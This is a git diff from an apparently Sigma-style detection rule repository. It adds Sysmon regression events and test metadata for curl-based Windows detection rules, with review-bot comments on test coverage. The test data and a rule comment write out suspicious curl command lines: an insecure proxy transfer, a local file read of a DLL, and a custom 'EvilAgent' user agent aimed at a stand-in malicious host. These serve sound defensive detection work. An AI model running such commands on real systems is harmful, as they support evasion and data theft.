zb*KLjNunAgi3h-Fx3dj7o2Q+t#0I*vl0e=T2zjeIfpeO-vc>Xv$BlkY!( zv7PuV!Qwisy^1pT3`a#Ww3hw+zOreiXdbd0#LBq3XoVwKB^efD&D?X$z1&aKacQG{ z4l`ax3wJ7KzqlvuLx_v$X9M3(>KGIG#YfaKJa7f=GnjV{crLJc(6s##Q8;NzB%7C-6OnPcNR`h^THn z`O{|@*0XgCrD4cbU?HP$5T!DX^9uSIffYN7*gA<`M(qIf4LSLKr)Si~Y!M@ikmyHG z33B5YIfzd$M)#p*5aUMCI_|!U(7;+5y^P0h*uW9JXfL^XANmF%Q*<)@=qsXk4Bx{T zaTHl`61$i-(Xtch>v1wge2>A3erOrRoC9tReD+|5F|?L2CufYFMJLhYcG=R6q1w}J zHwENrA-8$THR?%XYKmYKmYKmYKmYKmYKmYKmYKmY zKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmY zKmYKmYKmYKmYKmYKmYKmYKm`5|2>chW&1?_= literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json new file mode 100644 index 000000000..69e332233 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json 
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:45:56.284330Z"
+ }
+ },
+ "EventRecordID": 21680,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:45:56.239",
+ "ProcessGuid": "0197231E-68A4-693A-0713-000000000800",
+ "ProcessId": 13700,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl --proxy-insecure -p -x http://127.0.0.1:1234 --silent -v --show-error http://127.0.0.1:888/echo",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
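Review bot: This single sample only exercises the proxy branch of the rule (`--proxy-insecure` with an `-x http://127.0.0.1:1234` proxy); the rule's title in the matching info.yml, "Insecure Proxy/DOH Transfer Via Curl.EXE", suggests a second selection for the DNS-over-HTTPS variant that this event never touches. If the rule does key on `--doh-insecure` as well, a second recorded event covering that flag, with `match_count` raised accordingly, would keep that branch under regression; if not, the title in the info.yml overstates what is tested. The rule body itself is outside this chunk, so this is inferred from the title only.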
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml
new file mode 100644
index 000000000..9014d90aa
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml
@@ -0,0 +1,13 @@
+id: 11dd9a12-467e-4c13-b928-7c3aea60f59f
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77
+ title: Insecure Proxy/DOH Transfer Via Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx new file mode 100755 index 0000000000000000000000000000000000000000..c1390aafdf18f40aee0f11383c773cfc2a2a041b GIT binary patch literal 69632 zcmeI0O>A6O701te^WpK>Gh-(;rO>2F3Z)5&m0=6%+xAkoo`bd)H%| zIB_XE{%`c=-H&t6J@rwN+?zehgp(gw(aBr{K&v(53`CBT! zg#hRI-cO&}xn68n+ANzf`&-KFkID5tWpk%`qSA;@Ico@-$?t(E0KvJ(St*^@onO<$F@9Cu+PL|4UlS~FU)sYGKoF68x4c0z zq1}nfopGE_UQXI+=Zi<3NXQ8T+k*kQqh%Q@jr8U_tdM3>pxcYT=rv9qY2uo;7?fkUtgg;u4xdC`da)A=xabUD zaT7)EJwZF*O`|Q@*E{2wJqy7ld}1pymPs?U(zQ>HXF<%+>?QcUmS9^tf@G;8eLkL>O54LwNbT{ux@~77neVl|N!tNYgr2(*sW`Br zRb;HsGKQlIR}v-O8Ou6340r7VsP$OEPT+Ze=U%79pN4kD=f$seo4o?1zdG#(A%jIS zDNa2Nn>Qw_Lv{vjEqHkW43_Lr9Io@Ix9pLz#WM$f_ICLvQ|W7sXRrV6-Ht!(_8n1h ze?(EqOc5pTFP&T-^G62DU1yIy5`5z6U;gXi7jAnC4xhh|5nE~dLcg3ll zMLYB2IG#L(8E4NdB$2B)DSPk0on}5v1sTNl3M{Cv<-{-tm(bB4j>q5LmhONnmqE;L z+b{=ndH|M*LjnbL^F{TBYVneAu((y61(AyWw)o9 zL-}4%!5EggDyCrC+ZBzb&lzXjt+BnywJjg!x+AF@dV31G&bgh{jt-KB&I*NRxf3$5uFJhGYjISdRG3F^I*J#&8;|oz_4aY0sobd|sh%BzV4*Ps&YoEPg zj`WjwH7mSKsZ8F&n_WDC1%)JjIlEyR>B9-^YX`Ly5 z3}wWR-4ovjU0;Ab6Cff3yskt?0FMjGQ}zI|B##BwM^Qf-%N=sBokLbcP9H>>--EUX zub`ulDWZH7t;3j~GDX{c_qT#SH;y)Ty3;0OC-4?ohRn>S6Jln=3(YV_&tRAEJZwT& z-JSkpC=FsJe)ANsV_q+_CzfHI>G=yTPi;@i>o^E~{l^BkO}>8* z#_~Ot*)bYGZ_95ICUva1iH?+9c@oJ^S-coy-WnCtyVpT1uF6)UAQfLCi3L)-vYgjL~z%NesH3uy}2(@k|eSX6!0* z+4gtBJc#>!uy1YLNxW}VaH^ewjWdYQ_K!NhgEo%aj^}BeyZHN9mk5Y}2#A0Ph=2%) zfCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y z2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0P zh=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%) zfCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y z2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0P 
zh=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%) lfCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2>ibj_%|YLUSR+L literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json new file mode 100644 index 000000000..96eb7c085 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json 
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:51:23.281436Z"
+ }
+ },
+ "EventRecordID": 21706,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:51:23.255",
+ "ProcessGuid": "0197231E-69EB-693A-1313-000000000800",
+ "ProcessId": 13896,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl file:///C:\\Users\\xodih\\AppData\\Local\\Temp\\calc.dll",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml
new file mode 100644
index 000000000..a68d78d05
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml
@@ -0,0 +1,13 @@
+id: 4dfcc9a3-f555-4692-aa17-bca049de2f61
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: aa6f6ea6-0676-40dd-b510-6e46f02d8867
+ title: Local File Read Using Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx
diff --git a/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml b/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml
index 796cb8382..9278e854e 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml
@@ -22,3 +22,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml b/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml
index c47022bc2..b48dbea1b 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml
@@ -7,19 +7,26 @@ references:
 - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
 author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023-07-27
+modified: 2025-12-11
 tags:
 - attack.execution
 logsource:
 category: process_creation
 product: windows
 detection:
+ # Example: This command line would trigger the rule
+ # curl.exe -H "User-Agent: EvilAgent" http://malicious.example.com
 selection_img:
 - Image|endswith: '\curl.exe'
 - OriginalFileName: 'curl.exe'
- selection_header:
+ selection_header_flag_1:
 CommandLine|re: '\s-H\s' # Must be Regex as the flag needs to be case sensitive
+ selection_header_flag_2:
+ CommandLine|contains: '--header'
+ selection_user_agent:
 CommandLine|contains: 'User-Agent:'
- condition: all of selection_*
+ condition: selection_img and 1 of selection_header_* and selection_user_agent
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml
index d4174b490..00d4e7de0 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml
@@ -78,3 +78,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml
index 7a9688040..0df03ff35 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml
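Review bot: The new `selection_header_flag_2` (`CommandLine|contains: '--header'`) is the substantive change in this hunk, but the regression data it is paired with via the `regression_tests_path` added at the bottom is not in this chunk, so it cannot be seen whether any sample uses the long-form flag; a test that only records `-H` would leave the new branch without coverage and let a regression in it pass silently. The inline example under `detection:` shows only the short form as well; adding a second line, `# curl.exe --header "User-Agent: EvilAgent" http://malicious.example.com`, would document why the condition now reads `1 of selection_header_*`. The comment on `selection_header_flag_1` explains the case-sensitive regex, and a matching remark that `contains` on `--header` is case-insensitive but has no lowercase/uppercase collision (unlike `-H` vs `-h`) would make the asymmetry between the two selections deliberate rather than accidental-looking.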
+++ b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml
@@ -75,3 +75,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml b/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml
index a404e39aa..261dbcad7 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml
@@ -94,3 +94,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml b/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml
index 8c3360a74..18e416a32 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml
@@ -22,3 +22,4 @@ detection:
 falsepositives:
 - Access to badly maintained internal or development systems
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml b/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml
similarity index 85%
rename from rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml
rename to rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml
index eac8b3bf2..d6e5bfa58 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml
@@ -23,3 +23,4 @@ detection:
 falsepositives:
 - Access to badly maintained internal or development systems
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml b/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml
index 257c0f0f7..1e6a27821 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml
@@ -21,3 +21,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml